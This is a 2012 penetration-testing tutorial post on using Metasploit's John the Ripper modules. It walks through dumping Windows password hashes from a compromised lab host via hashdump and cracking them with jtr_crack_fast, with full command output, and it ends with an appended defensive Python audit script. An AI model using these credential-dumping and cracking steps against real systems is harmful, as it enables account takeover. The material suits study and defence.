197 Brute Force: John 4
Posted on 2012-10-3 20:45:35
Metasploit modules that call John for cracking:
  use auxiliary/analyze/jtr_aix
  use auxiliary/analyze/jtr_crack_fast
  use auxiliary/analyze/jtr_linux
  use auxiliary/analyze/jtr_mssql_fast
  use auxiliary/analyze/jtr_mysql_fast
  use auxiliary/analyze/jtr_oracle_fast
  use auxiliary/analyze/jtr_unshadow
  use auxiliary/analyze/postgres_md5_crack

Let's add a record:
  msf > creds -a 1.1.1.1 -p 3306 -u root -P AAB3E285149C0135D51A520E1940DD3263DC008C
  [*] Time: 2012-07-22 22:50:04 UTC Credential: host=1.1.1.1 port=3306 proto=tcp sname= type=password user=root pass=AAB3E285149C0135D51A520E1940DD3263DC008C active=true
  msf >

Take a look at it:
  msf > creds

  Credentials
  ===========

  host     port  user  pass                                      type      active?
  ----     ----  ----  ----                                      ----      -------
  1.1.1.1  3306  root  AAB3E285149C0135D51A520E1940DD3263DC008C  password  true

  [*] Found 1 credential.
  msf >

Then we can go into the cracking module and crack it. The default password list location:
  root@Dis9Team:/pen/msf3/data/john/wordlists# pwd
  /pen/msf3/data/john/wordlists

During a penetration test we can obtain hashes with certain modules, such as HASHDUMP. The passwords obtained are stored in the database, and we can crack them directly. For example, from lesson 191:
This calls the awesome password cracking tool john. You don't need to install it, it is already included. Wordlist: /msf3/data/john/wordlists/password.lst
  msf  post(hashdump) > sessions

  Active sessions
  ===============

    Id  Type                   Information                                      Connection
    --  ----                   -----------                                      ----------
    1   meterpreter x86/win32  XP-201112162005\Administrator @ XP-201112162005  192.1.1.100:1337 -> 192.1.1.2:1042

  msf  exploit(ms08_067_netapi) > use post/windows/gather/hashdump
  msf  post(hashdump) > set SESSION 1
  SESSION => 1
  msf  post(hashdump) > run

  [*] Obtaining the boot key...
  [*] Calculating the hboot key using SYSKEY 4763cb912d3684138823ad24aa8176bd...
  [*] Obtaining the user list and keys...
  [*] Decrypting user keys...
  [*] Dumping password hashes...

  Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:554256a059570d709ea8a2e2ebe7be5f:7e72d7a08835c7f52a6875307c5b758a:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:3929fd5afe9bb4209f171f8d749767f5:::
  dis9team:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  hack:1004:9d82cdff56b35758aad3b435b51404ee:f39934a2710a469b3c63ce1487794514:::
  helen:1005:58bd64a8be241d6eaad3b435b51404ee:595d296e5b95cb98e7703ade701e3068:::
  passwd:1006:91c7ae7122196b5eaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec:::
  test1:1007:e88d94d6ebd10fc7aad3b435b51404ee:aacd12d27c87cac8fc0b8538aed6f058:::
  fuckyou:1008:0a174c1272fcbcf7aad3b435b51404ee:1c4ecc8938fb93812779077127e97662:::

  [*] Post module execution completed

Enter the cracking module and crack:
  msf  post(hashdump) > use auxiliary/analyze/jtr_crack_fast
  msf  auxiliary(jtr_crack_fast) > run

  [*] Seeded the password database with 11 words...
  guesses: 6  time: 0:00:00:05 DONE (Wed Dec 21 19:08:04 2011)  c/s: 7449K  trying: WIG1900 - ZZZ1900
  Warning: passwords printed above might be partial and not be all those cracked
  Use the "--show" option to display all of the cracked passwords reliably
  [*] Output: Loaded 9 password hashes with no different salts (LM DES [128/128 BS SSE2-16])
  [*] Output: 123456           (cred_5)
  [*] Output: HACK             (cred_10)
  [*] Output: HELEN            (cred_11)
  [*] Output: PASSWD           (cred_12)
  [*] Output: TEST1            (cred_13)
  [*] Output: FUCKYOU          (cred_14)
  Warning: mixed-case charset, but the current hash type is case-insensitive;
  some candidate passwords may be unnecessarily tried more than once.
  guesses: 1  time: 0:00:00:06 DONE (Wed Dec 21 19:08:10 2011)  c/s: 25367K  trying: ||V} - |||}
  Warning: passwords printed above might be partial and not be all those cracked
  Use the "--show" option to display all of the cracked passwords reliably
  [*] Output: Loaded 9 password hashes with no different salts (LM DES [128/128 BS SSE2-16])
  [*] Output: Remaining 3 password hashes with no different salts
  [*] Output: (cred_9)
  guesses: 0  time: 0:00:00:00 DONE (Wed Dec 21 19:08:11 2011)  c/s: 1388K  trying: 89093 - 89092
  [*] Output: Loaded 9 password hashes with no different salts (LM DES [128/128 BS SSE2-16])
  [*] Output: Remaining 2 password hashes with no different salts
  [*] cred_14:FUCKYOU:0a174c1272fcbcf7aad3b435b51404ee:1c4ecc8938fb93812779077127e97662:::

  [*] cred_13:TEST1:e88d94d6ebd10fc7aad3b435b51404ee:aacd12d27c87cac8fc0b8538aed6f058:::

  [*] cred_12:PASSWD:91c7ae7122196b5eaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec:::

  [*] cred_11:HELEN:58bd64a8be241d6eaad3b435b51404ee:595d296e5b95cb98e7703ade701e3068:::

  [*] cred_10:HACK:9d82cdff56b35758aad3b435b51404ee:f39934a2710a469b3c63ce1487794514:::

  [*] cred_9::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

  [*] cred_8::aad3b435b51404eeaad3b435b51404ee:3929fd5afe9bb4209f171f8d749767f5:::

  [*] cred_6::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

  [*] cred_5:123456:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

  [*]

  [*] 9 password hashes cracked, 2 left

  guesses: 6  time: 0:00:00:13 DONE (Wed Dec 21 19:08:24 2011)  c/s: 15554K  trying: hack1900
  Warning: passwords printed above might not be all those cracked
  Use the "--show" option to display all of the cracked passwords reliably
  [*] Output: Loaded 9 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16])
  [*] Output: fuckyou          (cred_14)
  [*] Output: test1            (cred_13)
  [*] Output: passwd           (cred_12)
  [*] Output: helen            (cred_11)
  [*] Output: hack             (cred_10)
  [*] Output: 123456           (cred_5)
  guesses: 1  time: 0:00:00:05 DONE (Wed Dec 21 19:08:29 2011)  c/s: 29933K  trying: |||}
  Warning: passwords printed above might not be all those cracked
  Use the "--show" option to display all of the cracked passwords reliably
  [*] Output: Loaded 9 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16])
  [*] Output: Remaining 3 password hashes with no different salts
  [*] Output: (cred_9)
  guesses: 0  time: 0:00:00:00 DONE (Wed Dec 21 19:08:30 2011)  c/s: 1481K  trying: 89093 - 89092
  [*] Output: Loaded 9 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16])
  [*] Output: Remaining 2 password hashes with no different salts
  [*] cred_14:fuckyou:0a174c1272fcbcf7aad3b435b51404ee:1c4ecc8938fb93812779077127e97662:::

  [*] cred_13:test1:e88d94d6ebd10fc7aad3b435b51404ee:aacd12d27c87cac8fc0b8538aed6f058:::

  [*] cred_12:passwd:91c7ae7122196b5eaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec:::

  [*] cred_11:helen:58bd64a8be241d6eaad3b435b51404ee:595d296e5b95cb98e7703ade701e3068:::

  [*] cred_10:hack:9d82cdff56b35758aad3b435b51404ee:f39934a2710a469b3c63ce1487794514:::

  [*] cred_9::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

  [*] cred_6::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

  [*] cred_5:123456:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

  [*]

  [*] 8 password hashes cracked, 2 left

  [+] Cracked: fuckyou:fuckyou (192.1.1.4:445)
  [+] Cracked: test1:test1 (192.1.1.4:445)
  [+] Cracked: passwd:passwd (192.1.1.4:445)
  [+] Cracked: helen:helen (192.1.1.4:445)
  [+] Cracked: hack:hack (192.1.1.4:445)
  [+] Cracked: administrator:123456 (192.1.1.4:445)
  [+] Cracked: dis9team: (192.1.1.4:445)
  [+] Cracked: guest: (192.1.1.4:445)
  [*] Auxiliary module execution completed
  msf  auxiliary(jtr_crack_fast) >




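Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one know a weapon.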
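An added example, not part of the original post: a defender-side audit of the same pwdump-format lines (user:rid:lm:nt:::), showing why the LM pass above finishes in seconds. It recovers no passwords; the sample lines are copied from the hashdump output in the post, and the function names and finding labels are assumptions of this example.

```python
import re
from collections import Counter

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
RECORD = re.compile(r"([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):.*")

# Sample input: first lines of the hashdump output in the post, plus one junk line.
SAMPLE = """\
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:554256a059570d709ea8a2e2ebe7be5f:7e72d7a08835c7f52a6875307c5b758a:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:3929fd5afe9bb4209f171f8d749767f5:::
dis9team:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hack:1004:9d82cdff56b35758aad3b435b51404ee:f39934a2710a469b3c63ce1487794514:::
this line is not a pwdump record
"""

def parse_pwdump(text):
    """Yield (user, lm, nt) for each well-formed line; skip anything else."""
    for line in text.splitlines():
        m = RECORD.fullmatch(line.strip())
        if m:
            yield m.group(1), m.group(3).lower(), m.group(4).lower()

def audit(text):
    """Return {user: [findings]} describing weak hash storage per account."""
    records = list(parse_pwdump(text))
    nt_counts = Counter(nt for _, _, nt in records)
    report = {}
    for user, lm, nt in records:
        findings = []
        if lm != EMPTY_LM:
            findings.append("lm_hash_stored")  # case-insensitive, two 7-char DES halves
            if lm[16:] == EMPTY_LM[16:]:
                findings.append("password_max_7_chars")  # second half is empty
        if nt == EMPTY_NT:
            findings.append("blank_password")
        if nt_counts[nt] > 1:
            findings.append("nt_hash_shared")  # unsalted: same hash means same password
        report[user] = findings
    return report

if __name__ == "__main__":
    for user, findings in audit(SAMPLE).items():
        print(f"{user:18} {', '.join(findings) or 'ok'}")
```

Disabling LM hash storage (the NoLMHash policy) and then changing the affected passwords clears the first two findings.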
